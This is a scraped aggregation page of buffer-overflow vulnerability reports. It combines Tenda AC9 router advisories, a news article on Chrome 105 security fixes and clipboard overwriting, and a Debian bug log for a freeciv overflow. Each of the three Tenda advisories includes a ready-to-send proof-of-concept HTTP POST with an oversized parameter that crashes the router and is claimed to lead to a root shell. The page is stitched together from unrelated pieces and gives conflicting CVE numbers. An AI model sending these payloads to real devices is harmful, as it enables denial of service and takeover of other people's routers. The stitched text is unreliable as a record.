Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the mask parameter at /goform/WanParameterSetting.

**Tenda AC9 Wireless Router /goform/WanParameterSetting mask Stack Overflow****1 Basic Information**

*   Vulnerability Type: Buffer overflow
*   Vulnerability Description: A buffer overflow vulnerability exists in the Tenda AC9 wireless router, firmware version V15.03.05.19. Its /goform/WanParameterSetting implementation has a security vulnerability in the processing of mask POST key parameters, allowing remote attackers to use the vulnerability to submit special requests, resulting in buffer overflow, which can seriously lead to the execution of arbitrary OS commands.
*   Device model:
    *   Tenda AC9 Wireless Router
    *   Firmware Version: V15.03.05.19

**2 Vulnerability Value**

*   Stable Reproducibility: yes
*   Vulnerability Score (refer to CVSS)
    *   V2: \[8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C\](https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator ?vector=(AV:N/AC:M/Au:S/C:C/I:C/A:C))
    *   V3.1: \[9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\](https://nvd.nist.gov /vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H&version=3.1)
*   Exploit Conditions
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of exploit
        *   Permission Constraints: identity authentication is required
        *   User Interaction: no victim interaction required
    *   Scope of Impact: Changed (can affect components other than vulnerable components)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of exploits: stable recurrence
    *   Whether the product is configured by default: there are loopholes in the functional components that are enabled from the factory
*   Exploit Effect
    *   Denial of service
    *   Remote Code Execution (RCE)

**3 PoC**

POST /goform/WanParameterSetting HTTP/1.1
Host: 10.37.129.2:8081
Connection: keep-alive
Content-Length: 1077
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.37.129.2:8081
Referer: http://10.37.129.2:8081/system\_led.html?random=0.7969342657337226&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=sou23f

wanType=1&adslUser=10192.168.0.22255.255.255.0192.168.0.1114.114.114.1148.8.8.8wan1&adslPwd=10192.168.0.22255.255.255.0192.168.0.1114.114.114.1148.8.8.8wan1&vpnServer=10192.168.0.22255.255.255.0192.168.0.1114.114.114.1148.8.8.8wan1&vpnUser=10192.168.0.22255.255.255.0192.168.0.1114.114.114.1148.8.8.8wan1&vpnPwd=10192.168.0.22255.255.255.0192.168.0.1114.114.114.1148.8.8.8wan1&vpnWanType=1&dnsAuto=0&staticIp=192.168.0.22&mask=\\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&gateway=192.168.0.1&dns1=114.114.114.114&dns2=8.8.8.8&module=wan1&downSpeedLimit=

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell.

**4 Vulnerability Principle**

When the web management component receives a POST request, its /goform/WanParameterSetting component implements a security vulnerability in processing the mask POST key parameter. The length of the mask parameter key can be any length and is placed on the stack without checking, resulting in stack overflow. Attackers can use this vulnerability to overwrite the return address, and then be exploited to achieve the effect of remote arbitrary command execution.

**5 Judgment basis different from historical Vulnerabilities**

Searching the WanParameterSetting keyword in the NVD database reveals CVE-2022-34597 , CVE-2022-34596, CVE-2022-24144, CVE-2019-5071, CVE-2019-5072 five vulnerabilities, these vulnerabilities are all command injection vulnerabilities, not buffer overflow vulnerabilities, so it is not the same vulnerability as this vulnerability.

CVE-2022-36571: IoTvuln/tenda_ac9_WanParameterSetting.md at main · CyberUnicornIoT/IoTvuln

Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the deviceList parameter at /goform/setMacFilterCfg.

CVE-2022-36569: IoTvuln/tenda_ac9_setMacFilterCfg.md at main · CyberUnicornIoT/IoTvuln

Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the time parameter at /goform/SetLEDCfg.

Permalink

Cannot retrieve contributors at this time

**Tenda AC9 Wireless Router /goform/SetLEDCfg time Stack Overflow****1 Basic Information**

*   Vulnerability Type: Buffer overflow
*   Vulnerability Description: There is a buffer overflow vulnerability in the Tenda AC9 wireless router, firmware version V15.03.05.19. Its /goform/SetLEDCfg implementation has a security vulnerability in the processing of the time POST key parameter, allowing remote attackers to use the vulnerability to submit special requests, resulting in buffer overflow, which can seriously lead to the execution of arbitrary OS commands.
*   Device model:
    *   Tenda AC9 Wireless Router
    *   Firmware Version: V15.03.05.19

**2 Vulnerability Value**

*   Stable Reproducibility: yes
*   Vulnerability Score (refer to CVSS)
    *   V2: \[8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C\](https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator ?vector=(AV:N/AC:M/Au:S/C:C/I:C/A:C))
    *   V3.1: \[9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\](https://nvd.nist.gov /vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H&version=3.1)
*   Exploit Conditions
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission constraints: identity authentication is required
        *   User interaction: no victim interaction required
    *   Scope of Impact: Changed (can affect components other than vulnerable components)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of Exploits: stable recurrence
    *   Whether the product is configured by default: there are loopholes in the functional components that are enabled from the factory
*   Exploit Effect
    *   Denial of Service
    *   Remote Code Execution (RCE)

**3 PoC**

POST /goform/SetLEDCfg HTTP/1.1
Host: 10.37.129.2:8081
Connection: keep-alive
Content-Length: 445
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.37.129.2:8081
Referer: http://10.37.129.2:8081/system\_led.html?random=0.7969342657337226&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=sou23f

ledType=close&timetimetimetimetimeimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetimetime=&ledCloseType=undefined

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell.

**4 Vulnerability Principle**

When the web management component receives a POST request, its /goform/SetLEDCfg component implements a security vulnerability in processing the time POST key parameter. The length of the time parameter key can be any length and is placed on the stack without checking, resulting in a stack overflow. Attackers can use this vulnerability to overwrite the return address, and then be exploited to achieve the effect of remote arbitrary command execution.

CVE-2022-36570: IoTvuln/tenda_ac9_SetLEDCfg.md at main · CyberUnicornIoT/IoTvuln

Tenda AC9 V15.03.05.19 was discovered to contain a stack overflow via the list parameter at /goform/setPptpUserList.

**Tenda AC9 Wireless Router /goform/setPptpUserList list Stack Overflow****1 Basic Information**

*   Vulnerability Type: Buffer overflow
*   Vulnerability Description: A buffer overflow vulnerability exists in the Tenda AC9 wireless router, firmware version V15.03.05.19. Its /goform/setPptpUserList implementation has a security vulnerability in the processing of list POST parameters, allowing remote attackers to use the vulnerability to submit special requests, resulting in buffer overflow, which can seriously lead to the execution of arbitrary OS commands.
*   Device model:
    *   Tenda AC9 Wireless Router
    *   Firmware Version: V15.03.05.19

**2 Vulnerability Value**

*   Stable Reproducibility: yes
*   Vulnerability Score (refer to CVSS)
    *   V2: \[8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C\](https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator ?vector=(AV:N/AC:M/Au:S/C:C/I:C/A:C))
    *   V3.1: \[9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\](https://nvd.nist.gov /vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H&version=3.1)
*   Exploit Conditions
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of exploit
        *   Permission Constraints: identity authentication is required
        *   User Interaction: no victim interaction required
    *   Scope of Impact: Changed (can affect components other than vulnerable components)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of exploits: stable recurrence
    *   Whether the product is configured by default: there are loopholes in the functional components that are enabled from the factory
*   Exploit Effect
    *   Denial of service
    *   Remote Code Execution (RCE)

**3 PoC**

POST /goform/setPptpUserList HTTP/1.1
Host: 10.37.129.2:8081
Connection: keep-alive
Content-Length: 2048
Accept: \*/\*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.37.129.2:8081
Referer: http://10.37.129.2:8081/system\_led.html?random=0.7969342657337226&
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: bLanguage=cn; password=sou23f

list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;asd;1;0;;;list=admin;admiansd;1;0;;;~sadw;

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell.

**4 Vulnerability Principle**

When the web management component receives a POST request, its /goform/setPptpUserList component implements a security vulnerability in processing the list POST parameter. The length of the list parameter can be any length and is placed on the stack without checking, resulting in stack overflow. Attackers can use this vulnerability to overwrite the return address, and then be exploited to achieve the effect of remote arbitrary command execution.

CVE-2022-36568: IoTvuln/tenda_ac9_setPptpUserList.md at main · CyberUnicornIoT/IoTvuln

But one issue that lets websites overwrite content on a user's system clipboard appears unfixed in the new Version 105 of Chrome.

Google's first stable channel version of Chrome 105 for Windows, Mac, and Linux, released this week, contained fixes for 24 vulnerabilities in previous versions of the software, including one "critical" flaw and eight that the company rated as being of "high" severity.

A plurality — nine — of the security issues that Google addressed with Chrome 105 were so-called use-after-free vulnerabilities, or flaws that allow attackers to use previously freed memory spaces to execute malicious code, corrupt data, and take other malicious actions. Four of the patched vulnerabilities were heap buffer-overflows in various Chrome components, including WebUI and Screen Capture.

Attackers often exploit buffer overflows for a variety of malicious purposes, including executing random code, overwriting data, crashing systems, and triggering denial-of-service conditions.

**Clipboard Overwriting**

One issue that Google does not appear to have fixed in the update centers around clipboards. According to Malwarebytes, when users of Google Chrome — or any Chromium-based browser — visit a website, the site can push any content they want to the user's OS clipboard, without the user's permission or any interaction.

"This means that by simply visiting a website, the data on your clipboard may be overwritten without your consent or knowledge," Malwarebytes said.

This can result in users losing valuable data they might have wanted to cut and paste elsewhere while also giving attackers an opening to try and sneak malicious code on a user's system, the security vendor said. The problem has to do with the absence of any requirement in Chrome and Chromium-based browser for users to take specific steps such as using "Ctrl+C" to copy content from a website to the user's clipboard, Malwarebytes said.

Security researcher Jeff Johnson identified the issue with Chrome as part of a broader problem that impacts both Safari and Firefox as well. "Chrome is currently the worst offender, because the user gesture requirement for writing to the clipboard was accidentally broken in version 104," he said in a report this week.

However, the reality is that users of other browsers such as Firefox and Safari can have websites overwriting their system clipboards more easily than they realize, Johnson said. Though both these browsers require users to take some action to copy website content to their clipboards, the actions are a lot broader than they might imagine.

For instance, actions like focusing out on a screen, or pressing keydown/ keyup and mousedown/ mouseup, can result in website content getting copied to the clipboard without the user's knowledge, Johnson said.

The researcher noted that Chrome developers are already aware of the issue and are addressing it. Google did not immediately response to a Dark Reading request for comment.

"Attackers may abuse this bug to copy malicious links to users' clipboards, which could result in users pasting those links in their address bar and accessing malicious sites accidentally," says Ivan Righi, senior cyber threat analyst at Digital Shadows.

"Another way this bug could be exploited is to conduct fraudulent cryptocurrency transactions. Threat actors could leverage the flaw in conjunction with social engineering attacks to get users to enter the wrong wallet addresses for transactions," Righi says. However, the likelihood of such attacks being successful is low because users are likely going to notice abnormal contents placed on their clipboard, he says.

**A Plethora of Use-After-Free Issues**

Meanwhile, the sole critical vulnerability (CVE-2022-3038) Google addressed with the stable version of Chrome 105 was reported by a security researcher from its own Project Zero bug hunting team: The use-after-free flaw in Google Chrome Network Service gives remote attackers a way to execute arbitrary code or trigger denial of service conditions on user systems by getting them to visit a weaponized website.

External bug hunters and security researchers reported all the remaining vulnerabilities that Google addressed this week in Chrome. The most consequential among them appears to have been CVE-2022-3039, a high-severity, user-after-free vulnerability in WebSQL that two researchers from China's 360 Vulnerability Research Institute reported to Google. The researchers received $10,000 for reporting the bug to Google — the highest amount awarded in the current set.

Another high-impact, use-after-free flaw in Chrome Layout garnered $9,000 for the anonymous security researcher that reported the issue to Google. Bounties for the remaining bugs ranged from $1,000 to $7,500. Google has not yet determined rewards for four bug disclosures.

As has become standard practice among major vendors, Google said it has restricted access to bug details until most users have an opportunity to implement the new, stable version of Chrome.

"We will also retain restrictions if the bug exists in a third-party library that other projects similarly depend on but haven’t yet fixed," Google said in a blog this week. A senior Microsoft security executive had recently used the same reason to explain why Microsoft's bug disclosures also contain scant details these days.

While the bug fixes are almost certainly the primary reason why users might want to update to the stable version of Chrome 105, the new browser version also introduces a handful of additional features. These include features that allow developers to add windows controls button — such as closing, maximizing, or minimizing — to progressive Web apps, a new picture-in-picture API for Chrome on Android, and improvements to Chrome's Navigation API.

Google Fixes 24 Vulnerabilities With New Chrome Update

Alpha7 PC Loader (All versions) is vulnerable to a stack-based buffer overflow while processing a specifically crafted project file, which may allow an attacker to execute arbitrary code.

CVE-2022-1888

A heap buffer overflow flaw was found in Libtiffs' tiffinfo.c in TIFFReadRawDataStriped() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffinfo tool, triggering a heap buffer overflow issue and causing a crash that leads to a denial of service.

'2074404?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-1354: Invalid Bug ID

A stack buffer overflow flaw was found in Libtiffs' tiffcp.c in main() function. This flaw allows an attacker to pass a crafted TIFF file to the tiffcp tool, triggering a stack buffer overflow issue, possibly corrupting the memory, and causing a crash that leads to a denial of service.

'2074415?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2022-1355: Invalid Bug ID

Freeciv before 2.6.7 and before 3.0.3 is prone to a buffer overflow vulnerability in the Modpack Installer utility's handling of the modpack URL.

**Debian Bug report logs - #1017579  
freeciv: CVE-2022-3904: Modpack Installer buffer overflow**

Reply or subscribe to this bug.

Toggle useless messages

**Report forwarded** to debian-bugs-dist@lists.debian.org, team@security.debian.org, Debian Games Team <pkg-games-devel@lists.alioth.debian.org>:  
Bug#1017579; Package src:freeciv. (Wed, 17 Aug 2022 22:54:03 GMT) (full text, mbox, link).

**Acknowledgement sent** to Moritz Muehlenhoff <jmm@debian.org>:  
New Bug report received and forwarded. Copy sent to team@security.debian.org, Debian Games Team <pkg-games-devel@lists.alioth.debian.org>. (Wed, 17 Aug 2022 22:54:04 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

Source: freeciv
Version: 2.6.6-1
Severity: grave
Tags: security
X-Debbugs-Cc: Debian Security Team <team@security.debian.org>

Quoting from the announcement posted to oss-security (no CVE is
available):

----------------------------------------------------------------------
 Just released freeciv-2.6.7 & freeciv-3.0.3 fix buffer overflow in
 Modpack Installer utility's handling of the modpack URL. Specially
 crafted URLs, without any '/' -characters would result in an
 underflowing length (unsigned)(-1) string copy, i.e., all of the
 NULL-terminated string given as "URL" would get written beyond the
 buffer reserved for it.

 Freeciv source tarballs are available from
 https://www.freeciv.org/download.html for current 3.0, and from
 https://www.freeciv.org/wiki/Old\_downloads for 2.6.

 In case you can't make full version update at the moment, bug tracker
 ticket has also a patch for this single issue attached:
 https://osdn.net/projects/freeciv/ticket/45299
----------------------------------------------------------------------

**Changed Bug title to 'freeciv: CVE-2022-6083: Modpack Installer buffer overflow' from 'Freeciv < 2.6.7, freeciv-3.0 < 3.0.3, Modpack Installer buffer overflow'.** Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Thu, 18 Aug 2022 04:33:02 GMT) (full text, mbox, link).

**Changed Bug title to 'freeciv: modpack installer buffer overflow' from 'freeciv: CVE-2022-6083: Modpack Installer buffer overflow'.** Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Fri, 19 Aug 2022 04:27:02 GMT) (full text, mbox, link).

**Changed Bug title to 'freeciv: freeciv modpack installer buffer overflow' from 'freeciv: modpack installer buffer overflow'.** Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Fri, 19 Aug 2022 07:48:02 GMT) (full text, mbox, link).

**Changed Bug title to 'Freeciv < 2.6.7, freeciv-3.0 < 3.0.3, Modpack Installer buffer overflow' from 'freeciv: freeciv modpack installer buffer overflow'.** Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Fri, 19 Aug 2022 07:48:04 GMT) (full text, mbox, link).

**Marked as found in versions freeciv/2.6.0-2.** Request was from Adrian Bunk <bunk@debian.org> to control@bugs.debian.org. (Tue, 30 Aug 2022 05:21:03 GMT) (full text, mbox, link).

**Added tag(s) pending.** Request was from Tobias Frost <tobi@debian.org> to control@bugs.debian.org. (Tue, 30 Aug 2022 11:09:04 GMT) (full text, mbox, link).

**Information forwarded** to debian-bugs-dist@lists.debian.org, Debian Games Team <pkg-games-devel@lists.alioth.debian.org>:  
Bug#1017579; Package src:freeciv. (Wed, 31 Aug 2022 06:00:02 GMT) (full text, mbox, link).

**Acknowledgement sent** to Salvatore Bonaccorso <carnil@debian.org>:  
Extra info received and forwarded to list. Copy sent to Debian Games Team <pkg-games-devel@lists.alioth.debian.org>. (Wed, 31 Aug 2022 06:00:02 GMT) (full text, mbox, link).

Message #24 received at 1017579@bugs.debian.org (full text, mbox, reply):

Control: retitle -1 freeciv: CVE-2022-3904: Modpack Installer buffer overflow

On Thu, Aug 18, 2022 at 12:51:28AM +0200, Moritz Muehlenhoff wrote:
> Source: freeciv
> Version: 2.6.6-1
> Severity: grave
> Tags: security
> X-Debbugs-Cc: Debian Security Team <team@security.debian.org>
> 
> Quoting from the announcement posted to oss-security (no CVE is
> available):
> 
> ----------------------------------------------------------------------
>  Just released freeciv-2.6.7 & freeciv-3.0.3 fix buffer overflow in
>  Modpack Installer utility's handling of the modpack URL. Specially
>  crafted URLs, without any '/' -characters would result in an
>  underflowing length (unsigned)(-1) string copy, i.e., all of the
>  NULL-terminated string given as "URL" would get written beyond the
>  buffer reserved for it.
> 
>  Freeciv source tarballs are available from
>  https://www.freeciv.org/download.html for current 3.0, and from
>  https://www.freeciv.org/wiki/Old\_downloads for 2.6.
> 
>  In case you can't make full version update at the moment, bug tracker
>  ticket has also a patch for this single issue attached:
>  https://osdn.net/projects/freeciv/ticket/45299
> ----------------------------------------------------------------------

CVE-2022-39047 has been assigned for this issue.

Regards,
Salvatore

**Changed Bug title to 'freeciv: CVE-2022-3904: Modpack Installer buffer overflow' from 'Freeciv < 2.6.7, freeciv-3.0 < 3.0.3, Modpack Installer buffer overflow'.** Request was from Salvatore Bonaccorso <carnil@debian.org> to 1017579-submit@bugs.debian.org. (Wed, 31 Aug 2022 06:00:03 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Wed Aug 31 07:04:06 2022; Machine Name: bembo

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

CVE-2022-39047: #1017579 - freeciv: CVE-2022-3904: Modpack Installer buffer overflow

This advisory contains mitigations for Inconsistent Interpretation of HTTP Requests, Use After Free, Classic Buffer Overflow, Integer Underflow, Improper Certificate Validation, Observable Discrepancy vulnerabilities in Hitachi Energy FACTS Control Platform (FCP).

Tag

#buffer_overflow